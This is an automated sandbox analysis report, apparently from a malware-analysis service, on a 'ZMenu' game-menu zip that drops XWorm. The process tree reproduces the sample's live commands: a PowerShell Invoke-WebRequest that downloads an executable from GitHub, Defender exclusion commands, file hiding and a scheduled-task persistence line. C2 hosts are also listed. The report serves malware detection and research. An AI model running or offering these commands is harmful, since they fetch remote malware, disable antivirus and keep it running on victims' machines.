Analysis
-
max time kernel
106s -
max time network
106s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
06/08/2024, 11:00
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://cdn.discordapp.com/attachments/1248218367941415004/1270056682516512838/ZMenu_v0.51_by_DeXstellius.zip?ex=66b2f8b5&is=66b1a735&hm=8951c9bb77293d9f98a67cf60d7e5c3bbf11798418bff9115bacc1072fe6128b&
Resource
win10v2004-20240802-en
Errors
General
Malware Config
Signatures
-
Detect Xworm Payload 5 IoCs
resource yara_rule behavioral1/memory/2148-112-0x00000000002E0000-0x000000000065C000-memory.dmp family_xworm behavioral1/memory/2796-276-0x0000000000C30000-0x0000000000FAC000-memory.dmp family_xworm behavioral1/memory/2796-277-0x0000000000C30000-0x0000000000FAC000-memory.dmp family_xworm behavioral1/memory/2796-281-0x0000000000C30000-0x0000000000FAC000-memory.dmp family_xworm behavioral1/memory/2148-295-0x00000000002E0000-0x000000000065C000-memory.dmp family_xworm -
Blocklisted process makes network request 2 IoCs
flow pid Process 29 3012 powershell.exe 31 3012 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1500 powershell.exe 3056 powershell.exe 1492 powershell.exe 2920 powershell.exe 2212 powershell.exe 3012 powershell.exe 1108 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation ChromeUpdater.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk ChromeUpdater.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk ChromeUpdater.exe -
Executes dropped EXE 2 IoCs
pid Process 2148 ChromeUpdater.exe 2796 Runtime Broker.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\ProgramData\\Runtime Broker.exe" ChromeUpdater.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 30 raw.githubusercontent.com 31 raw.githubusercontent.com 50 pastebin.com 51 pastebin.com 53 7.tcp.eu.ngrok.io -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 47 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
pid Process 2148 ChromeUpdater.exe 2148 ChromeUpdater.exe 2148 ChromeUpdater.exe 2148 ChromeUpdater.exe 2148 ChromeUpdater.exe 2148 ChromeUpdater.exe 2796 Runtime Broker.exe 2796 Runtime Broker.exe 2148 ChromeUpdater.exe 2148 ChromeUpdater.exe 2148 ChromeUpdater.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Runtime Broker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ChromeUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "126" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 856 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 35 IoCs
pid Process 3732 msedge.exe 3732 msedge.exe 4276 msedge.exe 4276 msedge.exe 2136 identity_helper.exe 2136 identity_helper.exe 448 msedge.exe 448 msedge.exe 1108 powershell.exe 1108 powershell.exe 1108 powershell.exe 2920 powershell.exe 2920 powershell.exe 2920 powershell.exe 3012 powershell.exe 3012 powershell.exe 3012 powershell.exe 2148 ChromeUpdater.exe 2148 ChromeUpdater.exe 2212 powershell.exe 2212 powershell.exe 2212 powershell.exe 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe 3056 powershell.exe 3056 powershell.exe 3056 powershell.exe 1492 powershell.exe 1492 powershell.exe 1492 powershell.exe 2148 ChromeUpdater.exe 2148 ChromeUpdater.exe 2796 Runtime Broker.exe 2796 Runtime Broker.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 1108 powershell.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeDebugPrivilege 3012 powershell.exe Token: SeDebugPrivilege 2148 ChromeUpdater.exe Token: SeDebugPrivilege 2212 powershell.exe Token: SeDebugPrivilege 1500 powershell.exe Token: SeDebugPrivilege 3056 powershell.exe Token: SeDebugPrivilege 1492 powershell.exe Token: SeDebugPrivilege 2148 ChromeUpdater.exe Token: SeDebugPrivilege 2796 Runtime Broker.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2148 ChromeUpdater.exe 2148 ChromeUpdater.exe 2796 Runtime Broker.exe 628 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4276 wrote to memory of 3812 4276 msedge.exe 83 PID 4276 wrote to memory of 3812 4276 msedge.exe 83 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 2064 4276 msedge.exe 84 PID 4276 wrote to memory of 3732 4276 msedge.exe 85 PID 4276 wrote to memory of 3732 4276 msedge.exe 85 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 PID 4276 wrote to memory of 880 4276 msedge.exe 86 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 5056 attrib.exe 3476 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1248218367941415004/1270056682516512838/ZMenu_v0.51_by_DeXstellius.zip?ex=66b2f8b5&is=66b1a735&hm=8951c9bb77293d9f98a67cf60d7e5c3bbf11798418bff9115bacc1072fe6128b&1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffcb96746f8,0x7ffcb9674708,0x7ffcb96747182⤵PID:3812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,10594815700369993345,7856376109795485498,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:22⤵PID:2064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,10594815700369993345,7856376109795485498,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2492 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,10594815700369993345,7856376109795485498,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:82⤵PID:880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,10594815700369993345,7856376109795485498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:12⤵PID:5080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,10594815700369993345,7856376109795485498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:12⤵PID:4264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,10594815700369993345,7856376109795485498,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:82⤵PID:4680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,10594815700369993345,7856376109795485498,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,10594815700369993345,7856376109795485498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:12⤵PID:4432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,10594815700369993345,7856376109795485498,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:12⤵PID:384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,10594815700369993345,7856376109795485498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:12⤵PID:2732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,10594815700369993345,7856376109795485498,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:12⤵PID:2836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,10594815700369993345,7856376109795485498,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5932 /prefetch:82⤵PID:784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,10594815700369993345,7856376109795485498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:12⤵PID:1372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,10594815700369993345,7856376109795485498,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6044 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:448
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1220
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1956
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1516
-
C:\Users\Admin\Downloads\ZMenu v0.51 by DeXstellius\ZMenu v0.51 by DeXstellius\ZMenu v0.51 by DeXstellius.exe"C:\Users\Admin\Downloads\ZMenu v0.51 by DeXstellius\ZMenu v0.51 by DeXstellius\ZMenu v0.51 by DeXstellius.exe"1⤵PID:1948
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start F:\97071441.bat2⤵PID:2160
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K F:\97071441.bat3⤵
- Enumerates connected drives
PID:4328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1108
-
-
C:\Windows\system32\chcp.comchcp 650014⤵PID:4388
-
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"4⤵PID:1224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\system32\attrib.exeattrib +h "Google Chrome" /s /d4⤵
- Views/modifies file attributes
PID:5056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://github.com/sa2141414/NewRepository-32525/raw/main/DontLaunch1.exe' -OutFile ChromeUpdater.exe"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
F:\ChromeUpdater.exeChromeUpdater.exe4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2148 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'F:\ChromeUpdater.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ChromeUpdater.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Runtime Broker.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\ProgramData\Runtime Broker.exe"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:856
-
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Google Chrome\ChromeUpdater.exe" /s /d4⤵
- Views/modifies file attributes
PID:3476
-
-
-
-
C:\ProgramData\Runtime Broker.exe"C:\ProgramData\Runtime Broker.exe"1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2796
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa396e055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:628
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵PID:4896
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
152B
MD5ff63763eedb406987ced076e36ec9acf
SHA116365aa97cd1a115412f8ae436d5d4e9be5f7b5d
SHA2568f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c
SHA512ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f
-
Filesize
152B
MD52783c40400a8912a79cfd383da731086
SHA1001a131fe399c30973089e18358818090ca81789
SHA256331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5
SHA512b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685
-
Filesize
186B
MD5094ab275342c45551894b7940ae9ad0d
SHA12e7ce26fe2eb9be641ae929d0c9cc0dfa26c018e
SHA256ef1739b833a1048ee1bd55dcbac5b1397396faca1ad771f4d6c2fe58899495a3
SHA51219d0c688dc1121569247111e45de732b2ab86c71aecdde34b157cfd1b25c53473ed3ade49a97f8cb2ddc4711be78fa26c9330887094e031e9a71bb5c29080b0d
-
Filesize
6KB
MD575b589fcd164ad5a86f2d72b40c2125d
SHA11e3a92b73dd03b841d73efdc67c5111d7ead67a3
